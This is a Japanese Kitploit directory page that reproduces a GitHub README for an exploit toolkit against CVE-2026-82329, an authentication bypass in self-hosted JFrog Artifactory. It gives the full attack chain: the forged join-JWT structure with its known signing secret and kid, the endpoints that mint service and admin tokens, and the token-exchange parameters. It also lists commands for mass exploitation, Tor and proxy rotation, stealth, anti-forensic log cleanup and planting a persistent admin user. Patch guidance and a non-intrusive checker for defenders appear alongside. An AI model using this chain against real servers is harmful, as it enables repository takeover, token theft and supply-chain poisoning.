Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/tc4dy/cve-2026-82329-poc-exploit
防御ツール脆弱性スキャナーペイロード生成エクスプロイトウェブアプリケーション悪用情報収集セキュリティ仮想化ペネトレーションテスト認証レッドチーミング
GitHubtc4dy/cve-2026-82329-poc-exploit

CVE-2026-82329-PoC-Exploit

10時間35分前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-82329(JFrog Artifactory の認証バイパス)向けのエクスプロイトおよび検出ツールキット。join JWT を偽造して管理者トークンを発行する。非侵入型のバージョンチェッカーを含む。

リポジトリを見る

CVEPoC

CVE‑2026‑82329 – JFrog Artifactory 認証バイパスツールキット

Python 3.8+ CVSS Author Artifactory

倫理的な使用のみ – 許可されたセキュリティテスト
このリポジトリは、許可されたセキュリティ専門家、ブルーチーム、ペネトレーションテスターのみにツールを提供します。
コンピュータシステムへの不正アクセスは、CFAA(米国)、Computer Misuse Act(英国)、TCK 243/244(トルコ)、および世界中の同様の法律の下で違法です。


📖 脆弱性の概要

CVE‑2026‑82329 は、セルフホスト型 JFrog Artifactory(バージョン 7.111.x から 7.161.x)における重大な認証バイパス脆弱性であり、未認証の攻撃者が JFrog Access クラスタ参加メカニズムを悪用して完全なプラットフォーム管理者トークンを取得できるようにします。

仕組み

  1. 空の参加キーの信頼 – JFrog Access は、値が空文字列であるファントム参加キーを信頼します。したがって、その署名シークレットは決定論的な値 32 * 0x20(スペース)です。
  2. 偽造された参加 JWT – 攻撃者は、この既知のシークレットと kid = SHA256("") で署名された HS256 JWT を偽造します。
  3. SERVICE トークンの発行 – POST /access/api/v1/registry/join は、認証なしで scp=admin を持つ SERVICE トークンを返します。
  4. 管理者トークンの交換 – scope=applied-permissions/admin&audience=* を指定した POST /access/api/v1/tokens により、完全なプラットフォーム管理者トークンが得られます。
  5. 影響 – リポジトリの完全な乗っ取り、トークン窃取、管理者ユーザーの作成、アーティファクトポイズニング、サプライチェーン攻撃、および接続されたサービス(Xray、Mission Control、Distribution)への横展開。直ちにアップグレードしてください!

影響を受けるバージョン

  • 7.111.4 – 7.111.20 – 脆弱
  • 7.117.0 – 7.117.27 – 脆弱
  • 7.125.0 – 7.125.19 – 脆弱
  • 7.133.0 – 7.133.28 – 脆弱
  • 7.146.0 – 7.146.36 – 脆弱
  • 7.161.0 – 7.161.19 – 脆弱

パッチ

  • 7.111.21、7.117.28、7.125.20、7.133.29、7.146.38、または 7.161.20 以降にアップグレードしてください。
  • アップグレードが不可能な場合は、Artifactory へのネットワークアクセスを制限し(インターネットに公開しないでください)、一時的な回避策としてすべての管理者トークンをローテーションしてください。

🧰 ツール

ツール目的対象ユーザー
exploit.pyJWT 偽造、管理者トークン交換、管理者ユーザー作成、大量スキャン、ステルスモード、プロキシローテーション、インタラクティブメニュー、完全な攻撃チェーンを備えた完全な武器化ツールキット。レッドチーム / 許可されたペンテスター
safechecker.py非侵入型の脆弱性チェッカー。トークンを取得したりペイロードを実行したりすることなく、Artifactory のバージョンを検出し、露出を検証し、リスクを評価します。JSON レポートを生成します。

📊 機能比較


🎯 ユースケースの概要


⚙️ インストール

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-82329-PoC-Exploit
cd CVE-2026-82329-PoC-Exploit
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests
urllib3
curl_cffi

📋 パラメータ

exploit.py のパラメータ

safechecker.py のパラメータ


💥 シナリオ


🧪 エンドポイントと悪用チェーン

このエクスプロイトは、以下の JFrog エンドポイントと悪用手順を使用します:

ペイロード形式

root@kitploit:~
# 偽造参加 JWT 構造
{
  "alg": "HS256",
  "typ": "JWT"
}
{
  "iat": <unix_timestamp>,
  "service_id": "jfrt@01",
  "kid": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
  "skip_node_registration": true
}

# 署名シークレット
secret = b"\x20" * 32

# 管理者トークンリクエスト
scope=applied-permissions/admin&audience=*&expires_in=0&refreshable=false

🛡️ 責任ある使用

  • これらのツールは、所有しているシステム、またはテストの明示的な書面による許可を得たシステムでのみ使用してください。
  • 不正アクセスは違法かつ非倫理的です。
  • 作者は、いかなる誤用についても責任を負いません。
  • 常に自国の法律および規制に従ってください。

このソフトウェアは、教育目的および許可されたセキュリティテストのみに提供されています。

ツールをダウンロード
ブルーチーム / セキュリティ監査人
機能exploit.pysafechecker.py
脆弱性検出✅✅
バージョン検出✅✅
偽造参加 JWT✅❌
サービストークン発行✅❌
管理者トークン交換✅❌
管理者ユーザー作成✅❌
リポジトリ一覧✅❌
ユーザー一覧✅❌
設定のダンプ✅❌
トークンのダンプ✅❌
完全な攻撃チェーン✅❌
インタラクティブメニュー✅❌
大量スキャン(マルチスレッド)✅✅
プロキシサポート✅✅
プロキシローテーション✅❌
Tor サポート(匿名性)✅❌
User‑Agent ローテーション(OPSEC)✅❌
ジッター(OPSEC)✅❌
適応型レートリミッター✅❌
非侵入型(安全)モード❌✅
バージョンレポート✅✅
匿名アクセスチェック❌✅
JSON レポート✅✅
ログクリーンアップ(アンチフォレンジック)✅❌
カスタム User‑Agent✅✅
SSL 検証制御✅✅
シナリオ推奨ツール
ブルーチーム – Artifactory が脆弱かどうかの確認safechecker.py
セキュリティ監査 – 非侵入型の脆弱性評価safechecker.py
レッドチーム – 完全な悪用を伴う許可されたペネトレーションテストexploit.py
バグバウンティ – 責任ある開示テストsafechecker.py
大量スキャン – 複数のターゲットの脆弱性チェックexploit.py(検出のみ)
インシデント対応 – システムが侵害されているかどうかの確認safechecker.py
パラメータ説明
-u, --url単一ターゲットの Artifactory URL(例: http://artifactory.example.com:8082)
-f, --file大量スキャン用のターゲットリストを含むファイル(1 行に 1 つ)
--create-admin永続的な管理者ユーザーを作成(形式: USER:PASS)
--keep-admin作成した管理者ユーザーを保持(スキャン後にクリーンアップしない)
--token-only管理者トークンのみを出力(単一ターゲット)
--interactive悪用後のインタラクティブメニュー
--service-id参加 JWT のサービス ID(デフォルト: jfrt@01)
-t, --threadsマルチターゲット用のスレッド数(デフォルト: 10)
--timeoutリクエストタイムアウト(デフォルト: 25 秒)
--retry最大リトライ回数(デフォルト: 3)
--proxyHTTP/HTTPS プロキシ(例: http://127.0.0.1:8080)
--proxy-listローテーション用のプロキシを含むファイル(1 行に 1 つ)
--jitterリクエスト間のランダムジッター(0~2 秒)
--stealthステルスモードを有効化(UA ローテーション + X‑Forwarded‑For)
--curl-cffiTLS フィンガープリント偽装のために curl_cffi を使用
--full完全な攻撃: すべてのモジュール
--dump-configシステム設定をダンプ
--dump-tokensすべてのアクセストークンをダンプ
--list-reposリポジトリを一覧表示
--list-usersユーザーを一覧表示
--detect検出のみ(管理者トークン交換なし)
--exploit完全な悪用を実行
-o, --outputJSON レポートをファイルに保存
-v, --verbose詳細出力
-q, --quietサイレントモード
パラメータ説明
-u, --url単一ターゲットの Artifactory URL(例: http://artifactory.example.com:8082)
-f, --fileターゲットリストを含むファイル(1 行に 1 つ)
-t, --threadsマルチターゲット用のスレッド数(デフォルト: 5)
--timeoutリクエストタイムアウト(デフォルト: 10 秒)
-v, --verbose詳細出力
-o, --outputJSON レポートをファイルに保存
#シナリオコマンド
1簡易脆弱性チェックpython safechecker.py -u http://artifactory.example.com:8082
2レポート付き詳細スキャンpython safechecker.py -u http://artifactory.example.com:8082 -o report.json -v
3ファイルからの大量監査python safechecker.py -f targets.txt -t 10 -o audit.json
4検出のみの悪用python exploit.py -u http://artifactory.example.com:8082 --detect
5管理者トークンのみを取得python exploit.py -u http://artifactory.example.com:8082 --token-only
6インタラクティブメニュー付き完全攻撃python exploit.py -u http://artifactory.example.com:8082 --interactive
7永続的な管理者ユーザーを作成python exploit.py -u http://artifactory.example.com:8082 --create-admin evil:P@ssw0rd1 --keep-admin
8設定のダンプpython exploit.py -u http://artifactory.example.com:8082 --dump-config
9リポジトリとユーザーの一覧python exploit.py -u http://artifactory.example.com:8082 --list-repos --list-users
10ステルス付き大量悪用python exploit.py -f targets.txt -t 20 --stealth --jitter --full -o results.json
11Tor によるプロキシローテーションpython exploit.py -f targets.txt --proxy-list proxies.txt --curl-cffi --stealth
ステップメソッドエンドポイント説明
1. 参加POST/access/api/v1/registry/join偽造 HS256 JWT → SERVICE トークン(scp=admin)
2. 交換POST/access/api/v1/tokensSERVICE トークン → プラットフォーム管理者トークン
3. 証明GET/artifactory/api/system/configuration管理者のみのアクセス証明
4. 永続化PUT/artifactory/api/security/users/{user}永続的な管理者ユーザーを作成
5. 失効DELETE/access/api/v1/tokens/{id}作成したトークンをクリーンアップ